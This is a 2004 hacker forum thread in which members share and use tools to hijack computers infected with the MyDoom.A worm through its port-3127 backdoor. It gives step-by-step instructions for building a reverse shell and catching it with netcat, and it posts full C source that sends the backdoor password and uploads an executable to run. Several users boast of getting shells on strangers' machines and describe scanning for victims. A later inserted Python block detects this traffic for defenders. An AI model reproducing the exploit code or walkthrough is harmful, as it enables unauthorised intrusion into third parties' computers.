Now it is here. One good friend of mine, kralor, released this application. What the application does: it uploads and then executes an application that can't be larger than 1599 bytes. What kralor also released was an application he made in ASM that creates a reverse shell program that is under 1599 bytes, 1.536 if I'm not remembering wrong. So now you can exploit MyDoom. And notice that it is only the version 'A' you can exploit.
So some information about this worm (only what I have seen):
Port: 3127
What does it do: It is trying to DoS (Denial of Service) the site http://www.sco.com. How it does this is simple: when many computers at once do it, it will crash and shut down. How it sends the DoS is with this simple HTTP header: "GET / HTTP/1.1"
And guys, btw, don't be too gay, exploiting a virus isn't too skilly
rsCRPT by Kralor: to create the reverse shell executable
MyKralor by Kralor: to upload and exec the executable on MyDoom.A
Thanks to my friend kralor, and the Coromputer team
sPiKie
Feb 9 2004, 03:00 PM
By the way, the time is 16:00 and http://www.sco.com/ is down. FUN! Hehe...! Kinda lol that it is down, I don't know yet why it is down, probably a lot of DoS attacks from kiddies/hackers.. etc..
clip
Feb 9 2004, 03:00 PM
QUOTE
What the application does: it uploads and then executes an application that can't be larger than 1599 bytes..
I created this code a few days ago.. the parameters are doom.exe <executable> <host> <port>
It works perfectly for any sized executable.
Paul
Feb 9 2004, 03:04 PM
Saw this 10 min earlier. Tested it and it works, thanks for posting though
sPiKie
Feb 9 2004, 03:08 PM
Clip, you're right, but what the application does is upload and then execute an application that can't be larger than 1599 bytes.. That's what the application that KRALOR made does. Nice code dude
clip
Feb 9 2004, 03:10 PM
oh.. ok.. so it's kinda a crippled exploit I guess..
sPiKie
Feb 9 2004, 03:18 PM
Yah Hehe, I think he made it because then everybody must download his Reverse Shell executable maker tool too (rsCRPT); but he is not what you call a newbie. And to be honest I think it's ok that he published it. Because every scriptie will just upload their Optix or trojan and start playing...
T3cHn0b0y
Feb 9 2004, 03:20 PM
1.5 KB's enough to do anything you want!
ripper2k3
Feb 9 2004, 03:25 PM
I can't really understand how I get a shell with these tools. I must create the .exe and then upload it, and how do I get the shell? Please explain it more for me
fre4k
Feb 9 2004, 03:42 PM
Thanks for this nice shit, I hope it will work
fre4k
sPiKie
Feb 9 2004, 03:51 PM
ripper2k3, you're creating your Reverse Shell Executable with the rsCRPT tool, adding your IP address and your listening port.. When I say listening port I mean the port you're listening on, a specified port.. You can/should use the NetCat network tool to listen for a connection on a port.. Then with your MyKralor tool, you just type the usage of the program like this... Syntax: mykralor.exe <infected ip> <port> <program to upload/execute> That's all. You should know how to do it now!!!
fre4k
Feb 9 2004, 04:16 PM
How do you mean this with nc? I don't understand?!? Sorry
shaun2k2
Feb 9 2004, 04:33 PM
Nice thread so far, but I can see a few people spoiling it.
Please, I want to remind people of something: Recently, registration was closed, and trial membership was introduced. This was intended to stop script kiddies ruining the board. Please do not ask how to use the information provided in the thread - think of it like this: if you don't know how to use the info, you probably SHOULDN'T.
Btw it gives you Guest access to the remote (or/and local PC - depends on who you tried it on :))
Oberon1879
Feb 9 2004, 04:59 PM
aww. kinda pity that it is public now. weird file size restriction though.
Subx
Feb 9 2004, 05:02 PM
After I uploaded the file, how do I connect to the shell? Telnet? Please tell me how :\
kenshin_efx
Feb 9 2004, 05:05 PM
Thanks a lot dude, thanks for sharing, I hope this is not down very fast like that RPC, or DameWare...
Grtz.
boshcash
Feb 9 2004, 05:08 PM
I got errors during compile. Can someone compile clip's code? I don't like that restriction
Leonnetje
Feb 9 2004, 05:10 PM
QUOTE (sPiKie @ Feb 9 2004, 03:51 PM)
ripper2k3, you're creating your Reverse Shell Executable with the rsCRPT tool, adding your IP address and your listening port.. When I say listening port I mean the port you're listening on, a specified port.. You can/should use the NetCat network tool to listen for a connection on a port.. Then with your MyKralor tool, you just type the usage of the program like this... Syntax: mykralor.exe <infected ip> <port> <program to upload/execute> That's all. You should know how to do it now!!!
Strange... I've done all those things.. entered my IP + NetCat port, then saved the Reverse Shell .exe and uploaded it with the MyKralor tool, but I can't seem to get a shell spawned in my NetCat window...
Am I doing something wrong??
ripper2k3
Feb 9 2004, 05:15 PM
Ahh it's ok, I thought it was harder but this way is easy to make
pe0n
Feb 9 2004, 05:25 PM
QUOTE
Okay I have tried this exploit, but not succeeded yet
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
I always get "Exiting" instead of a shell
I have netcat running and I have checked that the OS of the victim PC is Windows NT, XP or 2000
but no shell
Anyone know what I'm doing wrong?
I wrote that earlier today, and only because I did not take the time to look properly I did not see that I had actually gotten a remote shell in the "netcat window"
The window where you type the exploit commands doesn't become your shell, it's the window where you have netcat running... lol
Btw great exploit - I have gotten some shells on this exploit already
kebab1701
Feb 9 2004, 05:35 PM
hmmm I'll need to try this one
MysteryMan
Feb 9 2004, 05:42 PM
yeahhhhhhhh .......
thanks man a lot i must check this .....
peace & loff ......
Subx
Feb 9 2004, 05:45 PM
How do I connect to the shell!! Please help, Netcat?
m1k3
Feb 9 2004, 05:56 PM
Anyone know where the downloaded files go?
FakoLy
Feb 9 2004, 06:09 PM
Thanks, really nice exploit. I'm scanning for open 3127 ports and if I find some I will test this
Btw, when you build your exe with rCST.exe you have to put the victim's IP address and the port you want the victim IP to listen on, not yours, that's maybe why you haven't got a shell pe0n..
Oh and does somebody know where the files that you upload go on the victim's PC? Like in which directory?
sPiKie
Feb 9 2004, 06:11 PM
Here is my code if anyone is interested, gonna post the compiled file in the File Downloads section too
CODE
/**************************************/
/* Copyrights 2004 sPiKie tha m4st3r  */
/* Made to a friend                    */
/**************************************/
#include <stdio.h>
#include <stdlib.h>   /* atoi() */
#include <string.h>
#include <winsock.h>

#pragma comment (lib,"ws2_32")

int main(int argc, char *argv[])
{
    int sockfd, numbytes;
    struct hostent *he;
    struct sockaddr_in their_addr;                 // connector's address information
    char doompassword[] = "\x85\x13\x3c\x9e\xa2";  // the backdoor uses a password to open CreateProcess();)
    char buf[1024];
    int read = 0;
    FILE *fuckfile;
    WSADATA wsaData;                               // thihihi

    if (argc != 4) {                               // host, port and file are all required
        printf("Usage: %s <host> <port> <file to send>\n", argv[0]);
        return -1;
    }
    fuckfile = fopen(argv[3], "rb");
    if (fuckfile == NULL) {
        printf("[-] Open Failed\n");
        return -1;
    }
    printf("[+] File found ready to send\n");
    if (WSAStartup(0x101, &wsaData)) {
        printf("[-] Unable to load winsock.\n");
        return -1;
    }
    if ((he = gethostbyname(argv[1])) == NULL) {   // get the host info
        printf("[-] GetHostByName() Error!\n");
        return -1;
    }
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-] Can't open socket!\n");
        return -1;
    }
    their_addr.sin_family = AF_INET;               // host byte order
    their_addr.sin_port = htons(atoi(argv[2]));    // port
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);       // zero the rest of the struct
    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
        printf("[-] Connecting error\n");
        return -1;
    }
    printf("[+] Connected\n[+] Sending executable.\n");
    send(sockfd, doompassword, 5, 0);              // sending the password :)
    while (!feof(fuckfile)) {
        read = fread(buf, sizeof(char), sizeof(buf), fuckfile);
        if ((numbytes = send(sockfd, buf, read, 0)) == -1) {
            printf("[-] Sending executable failed\n");
            return -1;
        }
        printf(".");
    }
    printf("[+] All done, server have now executed your executable!\n");
    fclose(fuckfile);
    closesocket(sockfd);
    WSACleanup();
    return 0;
}
/* Thanks to clip for his "password" */
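From the defender's side, here is an added example (not code from the thread or from kralor's tools) that turns the facts posted above, the backdoor on port 3127, the 5-byte password that sPiKie's code sends first, and the "GET / HTTP/1.1" flood at www.sco.com, into detection logic run over flow records. The flow-line format, the hosts in the sample data and the flood threshold are assumptions made for this example.

```python
import re
from collections import defaultdict
# MyDoom.A facts quoted from the thread: backdoor on TCP 3127, a 5-byte
# "password" sent before the executable, and "GET / HTTP/1.1" floods at www.sco.com.
MYDOOM_A_MAGIC = b"\x85\x13\x3c\x9e\xa2"
BACKDOOR_PORT = 3127
DDOS_TARGET = "www.sco.com"
DDOS_THRESHOLD = 3  # GETs from one host before calling it a flood (assumption for the example)
# Assumed flow-log format: "src:sport > dst:dport [first payload bytes as hex]"
FLOW_RE = re.compile(r"^(?P<src>[\d.]+):\d+ > (?P<dst>[\w.-]+):(?P<dport>\d+)(?: (?P<payload>[0-9a-fA-F]*))?$")

SAMPLE_FLOWS = [  # constructed for this example, not real captures
    "10.0.0.5:49210 > 10.0.0.23:3127 85133c9ea24d5a90",  # password + 'MZ' = exe upload
    "10.0.0.9:51000 > 10.0.0.23:3127",                    # bare connect = someone scanning 3127
    "10.0.0.23:1034 > www.sco.com:80 474554202f20485454502f312e31",  # "GET / HTTP/1.1"
    "10.0.0.23:1035 > www.sco.com:80 474554202f20485454502f312e31",
    "10.0.0.23:1036 > www.sco.com:80 474554202f20485454502f312e31",
    "10.0.0.7:1200 > intranet.example:80 474554202f696e6465782e68746d6c",  # ordinary GET
]

def classify_flow(line):
    """Return (src, dst, [tags]) for one flow line, or None if it does not parse."""
    m = FLOW_RE.match(line)
    if not m:
        return None
    dport, payload = int(m["dport"]), bytes.fromhex(m["payload"] or "")
    tags = []
    if dport == BACKDOOR_PORT:  # nothing legitimate listens here, so any hit matters
        tags.append("backdoor_upload" if payload.startswith(MYDOOM_A_MAGIC) else "port_3127_probe")
    if dport == 80 and m["dst"] == DDOS_TARGET and payload.startswith(b"GET / HTTP/1.1"):
        tags.append("sco_ddos_get")
    return m["src"], m["dst"], tags

def summarize(lines):
    """Map each host to the verdicts the flows support (sorted list per host)."""
    gets, verdicts = defaultdict(int), defaultdict(set)
    for line in lines:
        parsed = classify_flow(line)
        if parsed is None:
            continue
        src, dst, tags = parsed
        if "backdoor_upload" in tags:   # the receiver is the infected box
            verdicts[dst].add("infected: backdoor used to push an executable")
        if "port_3127_probe" in tags:   # the sender is hunting for infected boxes
            verdicts[src].add("scanning for MyDoom.A backdoors")
        if "sco_ddos_get" in tags:      # repeated GET / at sco.com is the worm's payload
            gets[src] += 1
            if gets[src] >= DDOS_THRESHOLD:
                verdicts[src].add("infected: taking part in the sco.com DoS")
    return {host: sorted(v) for host, v in verdicts.items()}
```

Run over the sample flows, 10.0.0.23 is flagged both as the box whose backdoor was used and as a DoS participant, while 10.0.0.9 shows up only as a scanner.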
sPiKie
Feb 9 2004, 06:15 PM
FakoLy, I think it will go to the /windows/system32 directory under another name, but it will delete itself after the exploit.. The program uses the Win function CreateProcess()..
TheAngel
Feb 9 2004, 06:26 PM
Thanks, working like a charm but just guest permissions
Subx
Feb 9 2004, 06:28 PM
Spikie, after uploading how do I connect to the shell?
DiJiTooL
Feb 9 2004, 06:38 PM
Spikie, your exploit works GREAT!!!! Nice job!! Thank you man!
Copkill
Feb 9 2004, 06:42 PM
Nice, nice; works fine for me, got some shells but sometimes no admin rights ;(
Great work
Regards, Copkill
x1`
Feb 9 2004, 06:46 PM
Well, every file I try to send, it just says it's too big, but it's 797 KB (816,913 bytes)
and the other is 52.0 KB (53,248 bytes). Can someone please think why it's doing this?
SirSmokealot
Feb 9 2004, 06:51 PM
Great work!!! But I don't see the thing about it.. most systems will already be patched..... but I'll give it a try anyways....
Fernando093
Feb 9 2004, 06:51 PM
Thanks for the new eXploit sPiKie,,,
Great work fella!
ducky
Feb 9 2004, 06:52 PM
QUOTE (Dickybob20 @ Feb 9 2004, 06:46 PM)
Well, every file I try to send, it just says it's too big, but it's 797 KB (816,913 bytes)
and the other is 52.0 KB (53,248 bytes). Can someone please think why it's doing this?
That's 'cause 700+ KB is more than 1.5 KB!!!
Btw... anyone managed to get root access on this one?
FakoLy
Feb 9 2004, 06:52 PM
QUOTE (sPiKie @ Feb 9 2004, 06:15 PM)
FakoLy, I think it will go to the /windows/system32 directory under another name, but it will delete itself after the exploit.. The program uses the Win function CreateProcess()..
Yeah, in fact, thanks. Regards
x1`
Feb 9 2004, 06:55 PM
So what file sends successfully? Does it have to be an exe file or can it be a bat with echo commands?
Yemoke
Feb 9 2004, 06:59 PM
For the people that have no shell, I had that too, but after a few tries on different hosts I got one. Thanks mate, really nice spikie
/edit/ I had admin rights....
x1`
Feb 9 2004, 07:06 PM
Ok, I forgot to use that crt thing, so I make the shell and choose a port, it shows as a Windows file with no icon picture. Do I rename it to exe?
jimmy
Feb 9 2004, 07:07 PM
FakoLy
That's not correct. As far as I can see you need to take your own IP and port... I just executed my shell on a remote box manually and the nc listening on my comp got a shell
m1k3
Feb 9 2004, 07:21 PM
I tried to compile that source with Cygwin but it failed. Any ideas, or any other ways like lcc or MinGW?
kebab1701
Feb 9 2004, 07:24 PM
I'm getting shell after shell on this one, by the way, for you doubters
FakoLy
Feb 9 2004, 07:25 PM
QUOTE (jimmy @ Feb 9 2004, 07:07 PM)
FakoLy
That's not correct. As far as I can see you need to take your own IP and port... I just executed my shell on a remote box manually and the nc listening on my comp got a shell
Hmm, maybe this is why I haven't got a shell
QUOTE
C:\Documents and Settings\FakoLy>mykralor.exe x.x.x.x 3127 c:\windows\sy stem32\pasmx.exe [Crpt] mykralor v1.0 by kralor [Crpt] www.coromputer.net && IRC undernet #coromputer
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
C:\Documents and Settings\FakoLy>
No shell... I will try it with my IP and port. Thanks jimmy
x1`
Feb 9 2004, 07:27 PM
Do you rename the file you made with the crt app to exe? 'Cause it's just a plain file. Also, can I telnet instead of netcat, will that work?